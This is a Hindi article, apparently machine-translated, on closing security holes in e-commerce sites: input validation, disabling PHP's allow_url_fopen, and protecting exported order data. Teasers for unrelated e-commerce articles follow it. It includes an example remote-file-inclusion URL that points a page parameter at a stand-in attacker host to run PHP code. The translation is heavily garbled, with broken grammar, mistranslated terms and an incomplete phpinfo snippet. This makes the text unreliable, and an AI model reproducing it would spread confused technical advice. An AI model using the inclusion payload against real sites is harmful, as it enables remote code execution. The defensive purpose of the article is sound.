एक ई वाणिज्य वेबसाइट के लिए एक प्रमुख विचार करने की जरूरत में सुरक्षा जब विकासशील एक ई वाणिज्य वेबसाइट या सॉफ्टवेयर. एक डेवलपर के लिए सभी सुरक्षा जब एक साइट डिजाइन विचारों से अवगत होने की जरूरत है. ई के साथ-वाणिज्य इन दिनों अधिक आम होता जा रहा है, सुरक्षा के हमलों की संख्या में निश्चित रूप से बढ़ रही है. व्यामोह ई के लिए एक स्वस्थ बात-वाणिज्य साइट डेवलपर्स, हम सुरक्षा के मुद्दे के साथ गेट तक रखने की जरूरत है और हमारे कान और आँखें खुली रखो. हालांकि बाद कमियां, निम्नलिखित कमियां यदि वर्तमान गंभीर हैं आसानी से तय कर रहे हैं.
नीचे दिए गए कुछ सुरक्षा कारणों से शामिल हो रहे हैं जब एक साइट के विकास. इस लेख को शामिल नहीं करता है e-shoplifting, कृपया इस पर अपना अलग लेख देखें.
उपयोगकर्ता इनपुट - हर इनपुट, क्या यह मात्रा में प्रवेश कर सकता है, एक उत्पाद के लिए खोज, एक नाम दर्ज आदि, की जरूरत है संदिग्ध चरित्र के लिए मान्य होगा. यदि यह नहीं किया है, यह पीएचपी का समापन अंत टैग "?>", में प्रवेश संभव है और कुछ PHP कोड निष्पादित.
यह अब तक की अनुमति है सुरक्षित संख्या और अक्षरों az (राजधानियों शामिल है) और 0-9 और कुछ नहीं, बजाय सब चरित्र है कि वहाँ नहीं होना चाहिए की एक सूची बनाते हैं. सत्यापन स्क्रिप्ट के लिए एक के बाद एक एक चरित्र के माध्यम से पुस्तक की जरूरत है. इस सर्वर साइड सत्यापन में प्रयोग कर प्राप्त किया, नहीं हो जावास्क्रिप्ट की आवश्यकता है. का उपयोग कर सर्वर साइड इनपुट सत्यापन के लिए बाहर अवांछित अक्षर रखना आवश्यक है
एक और जब PHP कोड निष्पादन प्रमुख मौजूद है. जब PHP का उपयोग कर एक सेटिंग allow_url_fopen जो एक PHP स्क्रिप्ट से फाइल का उद्घाटन सक्षम बनाता है कहा जाता है. इस सेटिंग को बंद कर दिया जाना चाहिए, जब तक बिल्कुल आवश्यक है.
जरा कल्पना करो कि तुम दोनों तय हेडर और footers के लिए PHP स्क्रिप्ट है, और अपने वेब पृष्ठों http://www.mysite.com/index.php?page=page2 में आप टाइप करेंगे उपयोग. सभी इसे लेता है एक दुर्भावनापूर्ण उपयोगकर्ता के लिए में टाइप "ने इन मानकों को संशोधित करके एक स्क्रिप्ट चलाने के http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" के साथ है फाइल में कुछ PHP कोड hacker.txt "". तुम कुछ भी हो है, PHP पढ़ा, फ़ाइलें नष्ट कर दिया, महत्वपूर्ण जानकारी चोरी हो सकता है.
यदि आप सुनिश्चित नहीं हैं, अगर इस सेटिंग को बंद या चालू है, तो कृपया एक पाठ फ़ाइल में निम्नलिखित PHP कोड कॉपी करें और अपने वेब सर्वर पर अपलोड करें:
phpinfo ();
?>
आप अपने वेब सर्वर पर अपना जब स्क्रिप्ट का उपयोग, आप सेटिंग allow_url_fopen भर के विन्यास के अंतर्गत आ जाना चाहिए.
एक कंप्यूटर उपयोगकर्ता, सामान्य परिस्थितियों में इस सेटिंग के मूल्य नहीं मिल रहा है.
हो आदेशों की तरह निर्यात आंकड़ों के सावधान, CSV और mySQL फाइलों में उत्पादों. यदि यह डाटा एक स्क्रिप्ट से निर्यात और साझा फ़ाइल के नाम के तहत अर्थात् वेब सर्वर पर रखा है. http://www.mysite.com/admin/output_tables.csv. यह सच में ही एक समस्या है जब निर्यात डेटा एक निर्देशिका में एक फ़ाइल में रहता है कि सार्वजनिक रूप से सुलभ है. वहाँ दो तरीकों से इस सुरक्षा खामी को रोकने है - पहले एक कूटशब्द संरक्षित निर्देशिका के पीछे आउटपुट फ़ाइल है, तो दूसरी एक स्क्रिप्ट पर एक HTML textarea फार्म का तत्व के अंदर स्थित डाटा है. Storeowner तो textfile से इस जानकारी को कॉपी कर सकते हैं और अपने कंप्यूटर और पेस्ट जानकारी यहाँ पर एक नई फ़ाइल बनाएँ.
सभी इसे लेता है एक हैकर के लिए बाहर की जाँच e-वाणिज्य सॉफ्टवेयर प्रदर्शन और वेबसाइट एक असली साइट पर एक ही फ़ाइल नाम के लिए देखने के लिए इस फ़ाइल नाम पता है.
नीचे सूचीबद्ध अधिक "Ecommerce" लेख वर्ग से ऊपर लेख से संबंधित लेख हैं.
ऊपर लेख में रुचि "ई वाणिज्य सुरक्षा - सुरक्षा छेद Plugging" लोग भी संबंधित नीचे सूचीबद्ध लेख में रुचि रखते हैं:
एक e-वाणिज्य व्यापार चल रहा है बस अपनी वेबसाइट रखने बनाने और चलाने के बारे में नहीं है. अपने ग्राहकों के लिए उन्हें टेलीफोन, फैक्स, ईमेल, या अन्य प्रकार के माध्यम से सेवा करने की क्षमता पर भरोसा करते हैं, और यह आपके सिस्टम के सभी की आवश्यकता है के लिए काम करने के लिए ग्राहक अनुरोधों को पूरा कर सकता है.
अभी वापस दो दिन मैं कर रहा था मेरी एक दोस्त के साथ चैट. वह अपने बच्चे के 1 जन्मदिन मना रहे थे और केरल और चेन्नई, अपने काम में अपने पैतृक स्थान के बीच रन था. वह और उसका बेहतर आधा इन स्थानों के बीच कूच पिछले एक महीने में कम से कम 4 बार.
यदि आप समय के किसी भी राशि के लिए किया गया है ई वाणिज्य कर, तुम्हें पता होता है कि थोक dropship निर्देशिका सेवाओं की असली प्रदाताओं से अधिक scamers हैं. ई की दुनिया में व्यापार, Salehoo और दुनिया भर में सम्मानित ब्रांड दोनों सेवा प्रदाताओं कि पिछले कई वर्षों में लोकप्रियता हासिल की हैं.
यदि आप कभी भी एक ऑनलाइन खुदरा किया गया है, तो आप शायद पहले से ही Salehoo के बारे में सुना है या फिर इसे अपने लाभ के लिए इस्तेमाल किया. अगर तुम सिर्फ अपने व्यापार के साथ शुरू कर रहे हैं, आप मिश्रित Salehoo से उलझन में पड़ सकता है वहाँ समीक्षाएँ. अब, हमें क्या Salehoo सच है सब के बारे में और सेवाओं की पेशकश वे जो कई को नजरअंदाज करते हैं पर एक नज़र रखना.
कितने लोग क्या तुम्हें पता है कि कुछ ऑनलाइन खरीदा है? यदि आपकी तरह मुझे काफी कुछ है, इसलिए ecommerce दुनिया की नई ऑनलाइन शॉपिंग मॉल है. लेकिन इन ऑनलाइन खुदरा स्टोर कौन चलाता है? सिर्फ़ तुम्हारे और मेरे जैसे लोग, इसलिए इस व्यवसाय तेजी से बढ़ता है और अब तेजी और अच्छी तरह भविष्य में जारी रहेगा है.
यदि आप नवीनतम इलेक्ट्रॉनिक उत्पादों की एक बहुत बड़ी प्रशंसक हैं, आप अपने खुद के इलेक्ट्रॉनिक कारोबार ऑनलाइन चलाने का विचार द्वारा परीक्षा हो सकती है. यह है कि आरंभ करने के लिए कठिन है जब तुम सही इलेक्ट्रॉनिक्स सेवा नौवहन ड्रॉप का पूरा फायदा ले रहे हैं और वहाँ बहुत से चुनने के लिए आप के लिए नहीं है.
क्या तुमने कभी अपने स्थानीय सुविधा की दुकान में जाओ और पता नहीं क्या यह अच्छा होगा अगर आप इसे स्वामित्व होगा? क्या आप कोई अच्छा स्वामी हो सकते हैं, क्या तुम जैसे लोग? अच्छी तरह से इस अनुच्छेद आप अपने ऑनलाइन खुदरा स्टोर, या सामान्य रूप में जाना जाता मालिक के लाभों को दिखा देंगे ई वाणिज्य कि एक असली स्थानीय सुविधा की दुकान से अलग है.
